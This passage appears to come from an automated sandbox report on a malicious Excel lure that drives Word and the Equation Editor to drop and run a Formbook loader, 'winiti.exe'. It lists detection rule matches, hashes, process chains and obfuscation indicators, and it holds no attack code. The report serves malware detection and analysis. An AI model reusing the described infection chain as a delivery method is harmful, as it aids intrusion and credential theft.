                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E59559_2_009E5955
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009E394B9_2_009E394B
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00A13A839_2_00A13A83
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0095FBD79_2_0095FBD7
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009EDBDA9_2_009EDBDA
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00987B009_2_00987B00
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009FFDDD9_2_009FFDDD
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009EBF149_2_009EBF14
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098DF7C9_2_0098DF7C
                Source: RFQ#51281AOLAI.xlsOLE indicator, VBA macros: true
                Source: ~DFA1D41AEDA01093E0.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: ~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp.3.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\winiti.exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0095E2A8 appears 60 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 0095DF5C appears 137 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 009CF970 appears 84 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 009A3F92 appears 132 times
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: String function: 009A373B appears 253 times
                Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: winiti[1].exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: winiti.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 8.2.winiti.exe.22f505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 8.2.winiti.exe.22f505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 8.2.winiti.exe.5c0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 8.2.winiti.exe.5c0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/25@6/3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\45930000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRA478.tmpJump to behavior
                Source: RFQ#51281AOLAI.xlsOLE indicator, Workbook stream: true
                Source: 45930000.0.drOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: RFQ#51281AOLAI.xlsReversingLabs: Detection: 18%
                Source: RFQ#51281AOLAI.xlsVirustotal: Detection: 19%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: wow64cpu.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\winiti.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: RFQ#51281AOLAI.xlsStatic file information: File size 1155072 > 1048576
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: amWV.pdb source: winiti.exe, 00000008.00000000.439146431.0000000000302000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.6.dr, winiti.exe.6.dr
                Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000008.00000000.439146431.0000000000302000.00000020.00000001.01000000.00000005.sdmp, winiti[1].exe.6.dr, winiti.exe.6.dr
                Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp
                Source: 45930000.0.drInitial sample: OLE indicators vbamacros = False
                Source: RFQ#51281AOLAI.xlsInitial sample: OLE indicators encrypted = True

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 8.2.winiti.exe.22f505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 8.2.winiti.exe.5c0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                .NET source code contains potential unpacker
                Source: winiti[1].exe.6.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: winiti.exe.6.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: 8.2.winiti.exe.36d8a18.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 6_2_0057CA14 pushad ; retf 0057h6_2_0057CA15
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00401420 push es; retn 00F1h9_2_004014F8
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041F0DC push es; retf 9_2_0041F0E6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00412104 pushad ; ret 9_2_0041212D
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040C1EA push edx; retf 9_2_0040C1EE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00403260 push eax; ret 9_2_00403262
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00426263 push edi; iretd 9_2_0042626E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00408271 push es; ret 9_2_00408272
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00413A0B push esi; retf 9_2_00413A0E
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418A13 push ds; retf 2ECDh9_2_00418BEE
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418355 push ebp; retf 9_2_004183DC
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00418BA5 push ebx; iretd 9_2_00418BA6
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E653 push ds; iretd 9_2_0041E654
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0041E63B push ebx; iretd 9_2_0041E64C
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004187CA push ebp; ret 9_2_004187CB
                Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0095DFA1 push ecx; ret 9_2_0095DFB4
                Source: winiti[1].exe.6.drStatic PE information: section name: .text entropy: 7.760978166314589
                Source: winiti.exe.6.drStatic PE information: section name: .text entropy: 7.760978166314589
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, lcS7RE1vxlKWGpOeGp.csHigh entropy of concatenated method names: 'fjxuJCUCli', 'dq1ugTkcZZ', 'EJZQtHZv8D', 'u8iQm7fjBo', 'OsiQdgLBYT', 'Vk0Qn4e2ZN', 'g41QbOGAnA', 'crmQ0smGQj', 'TbgQkCV0e7', 'lrBQ5rmLQK'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, xFiqCjOS4mObwnqG7R.csHigh entropy of concatenated method names: 'EWef5wVsd5', 'xe6fKbwBF5', 'BugfOnUpLC', 'Tr4fhmj2e8', 'tFUfiw3ttv', 'YkRftnX2kA', 'flRfmMV13s', 'zrxfddUVsX', 'huMfnDADst', 'KeEfbtM9ml'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, Y56XpTEtPmCWtAUcx3.csHigh entropy of concatenated method names: 'U8pAH8qC9a', 'WokAyxrwL0', 'pVHA7wDedL', 'Bf0Ai2yNdm', 'nb8AmoaJP1', 'axnAdW0LNQ', 'MnMAbQqBYV', 'y2AA0G89VI', 'bLHA5DVVLb', 'CvaAPVhmyn'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, LQj0kcVZN6Kkvud9DR.csHigh entropy of concatenated method names: 'kBFw66mWtE', 'B7GwrZi6Hs', 'RyswQONdkA', 'NpTwuBdRYb', 'Ky4w98ov2t', 'QPJwIcU4LH', 'EXnwvV5Qp0', 'cjTwLFHLEs', 'V4wwsfDKcM', 'LGmwRtLJ7Z'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, bwrRjVyKj1VL5wCXv7.csHigh entropy of concatenated method names: 'iY1QeRlEfE', 'm5QQMY9dij', 'a8YQHnI8hN', 'lXYQyoXebK', 'aORQfrLs1B', 'yjtQc8VJGv', 'reLQ4K6HWa', 'pIOQwbduJF', 'ohrQF3L0hf', 'hZcQNBfeDd'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, H5DbcuXYjlGQPm0xJ0.csHigh entropy of concatenated method names: 'TIb4VdT1Zs', 'lsn4aIZ8Yc', 'WNcwpPSt2a', 'rnSwjmF1qY', 'g484PPCBwC', 'W9b4KFOl7d', 'RaV4EFNPE6', 'WWT4OYqenO', 'bkb4hoJiVW', 'b1e4qNRTCs'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, IcQdK2rXYfyvqYcyHa.csHigh entropy of concatenated method names: 'Dispose', 'RUTj2JsCi3', 'myp8iJBlW1', 'sxyRRK7glw', 'bbQjaj0kcZ', 's6Kjzkvud9', 'ProcessDialogKey', 'wRw8paIl7X', 'Frh8jHoQ1r', 'Itr88wKgcI'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, QoOP4PjGKS5gfhE57SM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CqRNO2qJae', 'G9FNh3I2Q6', 'uKENqXoB2e', 'tSdNxrJjlJ', 'CacNS6aQwa', 'UqYNX9D6wT', 'EVsNTXaS2Y'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, qKgcIJaPN5xDIttQpD.csHigh entropy of concatenated method names: 'PhUFj2dX4W', 'rMPFGPNVBu', 'DieFBnJWiM', 'ohEF6jvGsm', 'j2yFrLss94', 'StLFudw3uP', 'HY8F9s9TbD', 'VwdwTdWKCp', 'AZ5wVEa7Lv', 'VmGw2q4NJb'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, hNFj00Hv45CTOkfqEI.csHigh entropy of concatenated method names: 'SfPrO1ssyo', 'NDPrhawp0e', 'y6irq2u9mD', 'bhYrx4PFV0', 'hFSrSDP4cF', 'NAOrXTfqy2', 'BUorTLsn5H', 'zTArVVaxqj', 'hfAr2On37F', 'N7Bra3OAps'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, Q8PlVd7gMYjm0S8vYt.csHigh entropy of concatenated method names: 'Bpq93aGmUj', 'wTb9rMKOoC', 'iEc9unbdAm', 'i7l9IxK5H5', 'WE19vTwTjM', 'o9duSioOL5', 'F7BuX3OclH', 'lMkuTfOuXB', 'rbUuVL16tg', 'BLWu25cIwA'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, OOABLIblxanx4dA8KG.csHigh entropy of concatenated method names: 'qy6I6v0QNP', 'UJ8IQvx2QP', 'U5VI9jiagd', 'F5i9aeIwTX', 'IXI9z4S0JK', 'wPHIpTNuN4', 'v3RIjSIcOj', 'TbfI8DkhQl', 'TRWIGOfZ1W', 'JxrIBmWZim'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, f3eVc2kPtPvNgZNKDL.csHigh entropy of concatenated method names: 'uYjIlyACNl', 'dglIoMtatC', 'JIEIZtIDvN', 'j5SIeI2paI', 'jcvIJofeoR', 'qqqIMkFXex', 'qHYIgkNh8t', 'nYQIHJPpp8', 'UIFIyVd8tV', 'RskI1u4ivF'
                Source: 8.2.winiti.exe.3650ff8.5.raw.unpack, XC3FVVqBJrFXgahDpX.csHigh entropy of concatenated method names: 'ToString', 'Q7hcPUyHH6', 'n2VciTvqHJ', 'DZActfCNLB', 'IrNcm0wRNs', 'LEbcd8cteg', 'YMEcnGOoEo', 'KF4cbxNwLp', 'uxvc0HdMAp', 'UDFckP4YiN'
                Source: 8.2.winiti.exe.22f505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 8.2.winiti.exe.22f505c.3.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 8.2.winiti.exe.5c0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 8.2.winiti.exe.5c0000.1.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                Source: 8.2.winiti.exe.4e40000.6.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
